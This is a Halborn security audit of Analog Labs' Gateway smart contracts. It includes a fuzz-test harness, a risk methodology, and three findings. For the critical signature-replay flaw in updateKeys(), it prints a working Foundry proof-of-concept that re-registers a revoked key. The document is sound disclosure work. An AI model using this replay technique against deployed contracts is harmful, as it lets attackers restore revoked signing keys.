Halborn Logo

Gateway - Analog Labs


Prepared by:

Halborn Logo

HALBORN

Last Updated 06/27/2024

Date of Engagement by: June 12th, 2024 - June 20th, 2024

Summary

100% of all REPORTED Findings have been addressed

All findings

3

Critical

1

High

0

Medium

1

Low

0

Informational

1


1. Introduction

Analog Labs engaged Halborn to conduct a security assessment on their smart contracts beginning on June 12th, 2024, and ending on June 20th, 2024. The security assessment was scoped to the smart contracts provided in the following GitHub repository:

2. Assessment Summary

The team at Halborn was provided one and a half weeks for the engagement and assigned a full-time security engineer to verify the security of the smart contracts. The security engineer is a blockchain and smart-contract security expert with advanced penetration testing, smart-contract hacking, and deep knowledge of multiple blockchain protocols.

The purpose of this assessment is to:

- Ensure that the smart contract functions operate as intended.

- Identify potential security issues within the smart contracts.

In summary, Halborn identified some security risks that were addressed by the Analog Labs team.

3. Test Approach and Methodology

Halborn performed a combination of manual and automated security testing to balance efficiency, timeliness, practicality, and accuracy in regard to the scope of this assessment. While manual testing is recommended to uncover flaws in logic, process, and implementation; automated testing techniques help enhance coverage of the code and can quickly identify items that do not follow the security best practices. The following phases and associated tools were used during the assessment:

- Research into architecture and purpose.

- Smart contract manual code review and walkthrough.

- Graphing out functionality and contract logic/connectivity/functions. (solgraph)

- Manual assessment of use and safety for the critical Solidity variables and functions in scope to identify any arithmetic related vulnerability classes.

- Manual testing by custom scripts.

- Static Analysis of security for scoped contract, and imported functions. (Slither)

- Testnet deployment. (Foundry)

4. Fuzz tests: BranchlessMath library

Fuzz testing is a testing technique that involves sending randomly generated or mutated inputs to a target system to identify unexpected behavior or vulnerabilities. In the context of smart contract assessment, fuzz testing can help identify potential security issues by exposing the smart contracts to a wide range of inputs that they may not have been designed to handle.

In this assessment, we conducted comprehensive fuzzing tests on the BranchlessMath library to assess its resilience to unexpected inputs. Our goal was to identify any potential vulnerabilities or flaws that could be exploited by an attacker or any wrong or unintended logic. Medusa was the tool chosen to fuzz the BranchlessMath library.

Medusa is a cross-platform go-ethereum-based smart contract fuzzer inspired by Echidna. It provides parallelized fuzz testing of smart contracts through CLI, or its Go API that allows custom user-extended testing methodology.

The following test contract was built to fuzz-test the BranchlessMath library:

import "forge-std/Test.sol";
import "./BranchlessMath.sol";

// medusa fuzz --target-contracts "BranchlessMathTest" --test-limit 1000000

contract BranchlessMathTest is Test{

    // function min(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testMin(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.min(x, y);
        if(x > y){
            assert(returned == y);
        }
        else{
            assert(returned == x);
        }
    }

    // function max(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testMax(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.max(x, y);
        if(x > y){
            assert(returned == x);
        }
        else{
            assert(returned == y);
        }
    }

    // function select(bool condition, uint256 a, uint256 b) internal pure returns (uint256)
    function testSelectUint(bool cond, uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.select(cond, x, y);
        if(cond){
            assert(returned == x);
        }
        else{
            assert(returned == y);
        }
    }

    // function select(bool condition, address a, address b) internal pure returns (address)
    function testSelectAddr(bool cond, address x, address y) public {
        address returned = BranchlessMath.select(cond, x, y);
        if(cond){
            assert(returned == x);
        }
        else{
            assert(returned == y);
        }
    }

    // function selectIf(bool condition, uint256 value) internal pure returns (uint256)
    function testSelectIf(bool condition, uint256 value) public {
        uint256 returned = BranchlessMath.selectIf(condition, value);
        if(condition){
            assert(returned == value);
        }
        else{
            assert(returned == 0);
        }
    }

    // function saturatingAdd(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testSaturatingAdd(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.saturatingAdd(x, y);
        bool overflow;
        uint256 resultUnchecked;
        unchecked{
            resultUnchecked = x + y;
            // If x + y overflows, the result would be less than either x or y.
            if ((resultUnchecked < x) || (resultUnchecked < y)){
                overflow = true;
            }
        }
        if (overflow){
            assert(returned == type(uint256).max);
        }
        else{
            assert(returned == (x + y));
        }
    }

    // function saturatingSub(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testSaturatingSub(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.saturatingSub(x, y);
        bool underflow;
        if(y > x){
            underflow = true;
        }
        if (underflow){
            assert(returned == 0);
        }
        else{
            assert(returned == (x - y));
        }
    }

    // function saturatingMul(uint256 a, uint256 b) internal pure returns (uint256)
    function testSaturatingMul(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.saturatingMul(x, y);
        if(y == 0){
            assert(returned == 0);
            return;
        }
        bool overflow;
        uint256 resultUnchecked;
        unchecked{
            resultUnchecked = x * y;
            // If x * y overflows, the result would be less than either x or y.
            if ((resultUnchecked / y) != x){
                overflow = true;
            }
        }
        if (overflow){
            assert(returned == type(uint256).max);
        }
        else{
            assert(returned == (x * y));
        }
    }

    // function saturatingDiv(uint256 x, uint256 y) internal pure returns (uint256 r) 
    function testSaturatingDiv(uint256 x, uint256 y) public {
        if(y == 0){
            y = 1;
        }
        uint256 returned = BranchlessMath.saturatingDiv(x, y);
        assert(returned == (x / y));
    }

    // function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256)
    function testCeilDiv(uint256 x, uint256 y) public {
        // Ensure y is not zero to avoid division by zero
        if (y == 0) {
            y = 1;
        }
        uint256 returned = BranchlessMath.ceilDiv(x, y);
        if((x % y) == 0){
            assert(returned == x / y);
        }
        else{
            assert(returned == (x / y) + 1);
        }
    }

    // function toUint(bool b) internal pure returns (uint256 u)
    function testToUint(bool b) public {
        uint256 u = BranchlessMath.toUint(b);
        if(b){
            assert(u == 1);
        }
        else{
            assert(u == 0);
        }
    }
}

After running the fuzz session with medusa fuzz --target-contracts "BranchlessMathTest" --test-limit 1000000 no issues were found:

Medusa final output

5. RISK METHODOLOGY

Every vulnerability and issue observed by Halborn is ranked based on two sets of Metrics and a Severity Coefficient. This system is inspired by the industry standard Common Vulnerability Scoring System.
The two Metric sets are: Exploitability and Impact. Exploitability captures the ease and technical means by which vulnerabilities can be exploited and Impact describes the consequences of a successful exploit.
The Severity Coefficients is designed to further refine the accuracy of the ranking with two factors: Reversibility and Scope. These capture the impact of the vulnerability on the environment as well as the number of users and smart contracts affected.
The final score is a value between 0-10 rounded up to 1 decimal place and 10 corresponding to the highest security risk. This provides an objective and accurate rating of the severity of security vulnerabilities in smart contracts.
The system is designed to assist in identifying and prioritizing vulnerabilities based on their level of risk to address the most critical issues in a timely manner.

5.1 EXPLOITABILITY

Attack Origin (AO):
Captures whether the attack requires compromising a specific account.
Attack Cost (AC):
Captures the cost of exploiting the vulnerability incurred by the attacker relative to sending a single transaction on the relevant blockchain. Includes but is not limited to financial and computational cost.
Attack Complexity (AX):
Describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Includes but is not limited to macro situation, available third-party liquidity and regulatory challenges.
Metrics:
EXPLOITABILIY METRIC (mem_e)METRIC VALUENUMERICAL VALUE
Attack Origin (AO)Arbitrary (AO:A)
Specific (AO:S)
1
0.2
Attack Cost (AC)Low (AC:L)
Medium (AC:M)
High (AC:H)
1
0.67
0.33
Attack Complexity (AX)Low (AX:L)
Medium (AX:M)
High (AX:H)
1
0.67
0.33
Exploitability EE is calculated using the following formula:

E=meE = \prod m_e

5.2 IMPACT

Confidentiality (C):
Measures the impact to the confidentiality of the information resources managed by the contract due to a successfully exploited vulnerability. Confidentiality refers to limiting access to authorized users only.
Integrity (I):
Measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of data stored and/or processed on-chain. Integrity impact directly affecting Deposit or Yield records is excluded.
Availability (A):
Measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. This metric refers to smart contract features and functionality, not state. Availability impact directly affecting Deposit or Yield is excluded.
Deposit (D):
Measures the impact to the deposits made to the contract by either users or owners.
Yield (Y):
Measures the impact to the yield generated by the contract for either users or owners.
Metrics:
IMPACT METRIC (mIm_I)METRIC VALUENUMERICAL VALUE
Confidentiality (C)None (I:N)
Low (I:L)
Medium (I:M)
High (I:H)
Critical (I:C)
0
0.25
0.5
0.75
1
Integrity (I)None (I:N)
Low (I:L)
Medium (I:M)
High (I:H)
Critical (I:C)
0
0.25
0.5
0.75
1
Availability (A)None (A:N)
Low (A:L)
Medium (A:M)
High (A:H)
Critical (A:C)
0
0.25
0.5
0.75
1
Deposit (D)None (D:N)
Low (D:L)
Medium (D:M)
High (D:H)
Critical (D:C)
0
0.25
0.5
0.75
1
Yield (Y)None (Y:N)
Low (Y:L)
Medium (Y:M)
High (Y:H)
Critical (Y:C)
0
0.25
0.5
0.75
1
Impact II is calculated using the following formula:

I=max(mI)+mImax(mI)4I = max(m_I) + \frac{\sum{m_I} - max(m_I)}{4}

5.3 SEVERITY COEFFICIENT

Reversibility (R):
Describes the share of the exploited vulnerability effects that can be reversed. For upgradeable contracts, assume the contract private key is available.
Scope (S):
Captures whether a vulnerability in one vulnerable contract impacts resources in other contracts.
Metrics:
SEVERITY COEFFICIENT (CC)COEFFICIENT VALUENUMERICAL VALUE
Reversibility (rr)None (R:N)
Partial (R:P)
Full (R:F)
1
0.5
0.25
Scope (ss)Changed (S:C)
Unchanged (S:U)
1.25
1
Severity Coefficient CC is obtained by the following product:

C=rsC = rs

The Vulnerability Severity Score SS is obtained by:

S=min(10,EIC10)S = min(10, EIC * 10)

The score is rounded up to 1 decimal places.
SeverityScore Value Range
Critical9 - 10
High7 - 8.9
Medium4.5 - 6.9
Low2 - 4.4
Informational0 - 1.9

6. SCOPE

Files and Repository
(a) Repository: analog-gmp
(b) Assessed Commit ID: b4ce053
(c) Items in scope:
  • src/Gateway.sol
  • src/GatewayProxy.sol
  • src/Primitives.sol
↓ Expand ↓
Out-of-Scope:
Remediation Commit ID:
Out-of-Scope: New features/implementations after the remediation commit IDs.

7. Assessment Summary & Findings Overview

Critical

1

High

0

Medium

1

Low

0

Informational

1

Security analysisRisk levelRemediation Date
Gateway.updateKeys() signatures can be replayedCriticalSolved - 06/25/2024
Call is recommended over transfer to send native assetsMediumNot Applicable
Use block.chainId to set NETWORK_ID in the Gateway constructorInformationalAcknowledged

8. Findings & Tech Details

8.1 Gateway.updateKeys() signatures can be replayed

// Critical

Description

In the Gateway contract, the updateKeys() function is used to register shard public keys that then can be used to sign and send GMP messages:

function updateKeys(Signature calldata signature, UpdateKeysMessage memory message) public {
    bytes32 messageHash = message.eip712TypedHash(DOMAIN_SEPARATOR);
    _verifySignature(signature, messageHash);

    // Register shards pubkeys
    _updateKeys(messageHash, message.revoke, message.register);
}
/**
 * Execute GMP message
 * @param signature Schnorr signature
 * @param message GMP message
 */
function execute(Signature calldata signature, GmpMessage calldata message)
    external
    returns (GmpStatus status, bytes32 result)
{
    // Theoretically we could remove the destination network field
    // and fill it up with the network id of the contract, then the signature will fail.
    require(message.destNetwork == NETWORK_ID, "invalid gmp network");
    require(_networks[message.srcNetwork] != bytes32(0), "source network no supported");

    // Verify the signature
    (bytes32 messageHash, bytes memory data) = message.encodeCallback(DOMAIN_SEPARATOR);
    _verifySignature(signature, messageHash); // <-------------------
	...
}
function _verifySignature(Signature calldata signature, bytes32 message) private view {
    // Load shard from storage
    KeyInfo storage signer = _shards[bytes32(signature.xCoord)];

    // Verify if shard is active
    uint8 status = signer.status;
    require((status & SHARD_ACTIVE) > 0, "shard key revoked or not exists"); // <-------------------

    // Load y parity bit, it must be 27 (even), or 28 (odd)
    // ref: https://ethereum.github.io/yellowpaper/paper.pdf
    uint8 yParity = uint8(BranchlessMath.select((status & SHARD_Y_PARITY) > 0, 28, 27));

    // Verify Signature
    require(
        Schnorr.verify(yParity, signature.xCoord, uint256(message), signature.e, signature.s),
        "invalid tss signature"
    );
}

However, under the current implementation, the signature passed as parameter to the updateKeys() function can be replayed:

  1. Key "1337" is registered with signature1.

  2. Key "1337" is revoked with signature2.

  3. Any user can reuse signature1 to re-register the key "1337" as a valid key.

Proof of Concept
POC #1POC #2

Foundry POC:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
/** 
Run this test with:
forge test -vvvvv --match-contract Deploy --match-test test_setUp
forge test -vvvv --match-contract Deploy --match-test test_1
    - Signatures can be reused in updateKeys() function
*/
import "forge-std/Test.sol";
import "../src/Gateway.sol";
import "../src/Primitives.sol";
import "../src/GatewayProxy.sol";
import "../lib/frost-evm/sol/Schnorr.sol";
import "../lib/frost-evm/sol/Signer.sol";
contract Deploy is Test {
    using PrimitiveUtils for GmpMessage;
    using PrimitiveUtils for UpdateKeysMessage;
    Gateway public contract_Gateway;
    Gateway public contract_GatewayImplementation;
    address public owner = vm.addr(100);
    address public user1 = vm.addr(101);
    address public user2 = vm.addr(102);
    address public user3 = vm.addr(103);
    address public user4 = vm.addr(104);
    address public user5 = vm.addr(105);
    address public user6 = vm.addr(106);
    address public user7 = vm.addr(107);
    address public user8 = vm.addr(108);
    address public user9 = vm.addr(109);
    address public user10 = vm.addr(110);
    Signature signatureStored;
    function setUp() public {
        _deployAll();
    }
    function test_setUp() public view {
        console.log("test_setUp()");
        console.log("____________________________________");
        console.log("contract_GatewayImplementation -> %s", address(contract_GatewayImplementation));
        console.log("contract_Gateway -> %s", address(contract_Gateway));
    }
    function _deployAll() internal {
        console.log("_deployAll()");
        vm.startPrank(owner, owner);
        // 1 - Deploy the implementation contract
        address proxyAddr = vm.computeCreateAddress(owner, vm.getNonce(owner) + 2);
        contract_GatewayImplementation = new Gateway(2, proxyAddr);
        // 2 - Deploy the Proxy Contract
        Signer signer = new Signer(1337);
        TssKey[] memory keys = new TssKey[](1);
        keys[0] = TssKey({yParity: signer.yParity() == 28 ? 1 : 0, xCoord: signer.xCoord()});
        Network[] memory networks = new Network[](2);
        networks[0].id = 1; // sepolia network id
        networks[0].gateway = proxyAddr; // sepolia proxy address
        networks[1].id = 2; // shibuya network id
        networks[1].gateway = proxyAddr; // shibuya proxy address
        bytes memory initializer = abi.encodeCall(Gateway.initialize, (msg.sender, keys, networks));
        contract_Gateway = Gateway(address(new GatewayProxy(address(contract_GatewayImplementation), initializer)));
        vm.stopPrank();
    }
    function test_1() public {
        console.log(StdStyle.yellow("\n\ntest_1()"));
        console.log(StdStyle.yellow("__________________________\n"));
        /*
            function updateKeys(Signature memory signature, UpdateKeysMessage memory message)
            struct Signature {
                uint256 xCoord; // public key x coordinates, y-parity is stored in the contract
                uint256 e; // Schnorr signature e parameter
                uint256 s; // Schnorr signature s parameter
            }
            struct UpdateKeysMessage {
                TssKey[] revoke; // Keys to revoke
                TssKey[] register; // Keys to add
            }
        */
        {
            TssKey[] memory revoke = new TssKey[](0);
            TssKey[] memory register = new TssKey[](1);
            Signer signerCurrent = new Signer(1337);
            Signer signerToAdd = new Signer(1338);
            register[0].yParity = signerToAdd.yParity() == 28 ? 1 : 0;
            register[0].xCoord = signerToAdd.xCoord();
            UpdateKeysMessage memory message;
            message.revoke = revoke;
            message.register = register;
            vm.startPrank(owner, owner);
            Signature memory signature;
            uint256 hash = uint256(message.eip712TypedHash(contract_Gateway.DOMAIN_SEPARATOR()));
            // uint256 hash = uint256(keccak256(contract_Gateway.getUpdateKeysTypedHash(message)));
            (uint256 e, uint256 s) = signerCurrent.signPrehashed(hash, 1); // nonce = 1;
            signature.xCoord = signerCurrent.xCoord();
            signature.e = e;
            signature.s = s;
            // Add 1338
            console.log(StdStyle.yellow("\nOWNER(%s) calls < contract_Gateway.updateKeys(signature, message) >"), owner);
            contract_Gateway.updateKeys(signature, message);
            signatureStored = signature;
        }
        {
            TssKey[] memory revoke = new TssKey[](1);
            TssKey[] memory register = new TssKey[](0);
            Signer signerCurrent = new Signer(1337);
            Signer signerToRevoke = new Signer(1338);
            revoke[0].yParity = signerToRevoke.yParity() == 28 ? 1 : 0;
            revoke[0].xCoord = signerToRevoke.xCoord();
            UpdateKeysMessage memory message;
            message.revoke = revoke;
            message.register = register;
            vm.startPrank(owner, owner);
            Signature memory signature;
            uint256 hash = uint256(message.eip712TypedHash(contract_Gateway.DOMAIN_SEPARATOR()));
            (uint256 e, uint256 s) = signerCurrent.signPrehashed(hash, 1); // nonce = 1;
            signature.xCoord = signerCurrent.xCoord();
            signature.e = e;
            signature.s = s;
            // Revoke 1338
            console.log(StdStyle.yellow("\nOWNER(%s) calls < contract_Gateway.updateKeys(signature, message) >"), owner);
            contract_Gateway.updateKeys(signature, message);
        }
        vm.stopPrank();
        vm.startPrank(user1, user1);
        {
            // Reuse signature
            TssKey[] memory revoke = new TssKey[](0);
            TssKey[] memory register = new TssKey[](1);
            Signer signerToAdd = new Signer(1338);
            register[0].yParity = signerToAdd.yParity() == 28 ? 1 : 0;
            register[0].xCoord = signerToAdd.xCoord();
            UpdateKeysMessage memory message;
            message.revoke = revoke;
            message.register = register;
            console.log(StdStyle.yellow("\nUSER1(%s) calls < contract_Gateway.updateKeys(signature, message) >"), user1);
            contract_Gateway.updateKeys(signatureStored, message);
        }
        vm.stopPrank();
    }
}
BVSS
Recommendation

Consider hashing the signature struct, marking it as used once used, and adding a require check to the updateKeys() function that does not allow using an already used signature.

Remediation Plan

SOLVED: The Analog Labs team solved the issue by implementing the recommended solution.

Remediation Hash

8.2 Call is recommended over transfer to send native assets

// Medium

Description

The Gateway contract performs the gas refunds to the depositors by making use of the Solidity transfer() function:

// Calculate a gas refund, capped to protect against huge spikes in `tx.gasprice`
// that could drain funds unnecessarily. During these spikes, relayers should back off.
unchecked {
    uint256 refund = BranchlessMath.min(gasUsed * tx.gasprice, deposited);
    _deposits[message.source][message.srcNetwork] -= refund;
    payable(msg.sender).transfer(refund); // <-----------------------------------
}

In Solidity, the call() function is often preferred over transfer() for sending Ether In Solidity due to some gas limit considerations:

  • transfer: Imposes a fixed gas limit of 2300 gas. This limit can be too restrictive, especially if the receiving contract is a multisig wallet that executes more complex logic in its receive() function. For example, native transfer()calls to Gnosis Safe multisigs will always revert with an out-of-gas error in Binance Smart Chain.

  • call: Allows specifying a custom gas limit, providing more flexibility and ensuring that the receiving contract can perform necessary operations.

It should be noted that using call also requires explicit reentrancy protection mechanisms (e.g., using checks-effects-interactions pattern or the ReentrancyGuard contract from OpenZeppelin).

BVSS
Recommendation

Consider using call() over transfer() to transfer native assets in order to ensure compatibility with any type of multisig wallet. As for the reentrancy risks, these are currently mitigated by the following code in the Gateway.execute() function:

// Execute GMP message
function _execute(bytes32 payloadHash, GmpMessage calldata message, bytes memory data)
    private
    returns (GmpStatus status, bytes32 result)
{
    // Verify if this GMP message was already executed
    GmpInfo storage gmp = _messages[payloadHash];
    require(gmp.status == GmpStatus.NOT_FOUND, "message already executed");

    // Update status to `pending` to prevent reentrancy attacks.
    gmp.status = GmpStatus.PENDING;
    gmp.blockNumber = uint64(block.number);
	...
}

Remediation Plan

NOT APPLICABLE: The Analog Labs team states that only their own chronicles will call this function and receive by it and hence it will not be used by and external smart contract.

8.3 Use block.chainId to set NETWORK_ID in the Gateway constructor

// Informational

Description

In the GatewayEIP712 contract, the networkId is passed as a parameter to the contract constructor:

constructor(uint16 networkId, address gateway) {
    NETWORK_ID = networkId;
    PROXY_ADDRESS = gateway;
    DOMAIN_SEPARATOR = computeDomainSeparator(networkId, gateway);
}

This can be prone to human errors and instead, block.chainId can be used.

Score
Recommendation

Consider using block.chainId in the GatewayEIP712 contract constructor:

constructor(address gateway) {
    NETWORK_ID = block.chainId; // <-------------------------
    PROXY_ADDRESS = gateway;
    DOMAIN_SEPARATOR = computeDomainSeparator(networkId, gateway);
}

Remediation Plan

ACKNOWLEDGED: The Analog Labs team acknowledged this finding.

9. Automated Testing

Halborn used automated testing techniques to enhance the coverage of certain areas of the smart contracts in scope. Among the tools used was Slither, a Solidity static analysis framework. After Halborn verified the smart contracts in the repository and was able to compile them correctly into their ABIS and binary format, Slither was run against the contracts. This tool can statically verify mathematical relationships between Solidity variables to detect invalid or inconsistent usage of the contracts' APIs across the entire code-base.

Gateway.sol

Gateway #1Gateway #2

GatewayProxy.sol

GatewayProxy #1
  • Ether is not sent to an arbitrary destination. It is sent to the execute() caller which should be always a pivileged account.

  • The controlled delegate call flagged by Slither is used to perform a contract upgrade.

  • No major issues were found by Slither.

Halborn strongly recommends conducting a follow-up assessment of the project either within six months or immediately following any material changes to the codebase, whichever comes first. This approach is crucial for maintaining the project’s integrity and addressing potential vulnerabilities introduced by code modifications.

© Halborn 2024. All rights reserved.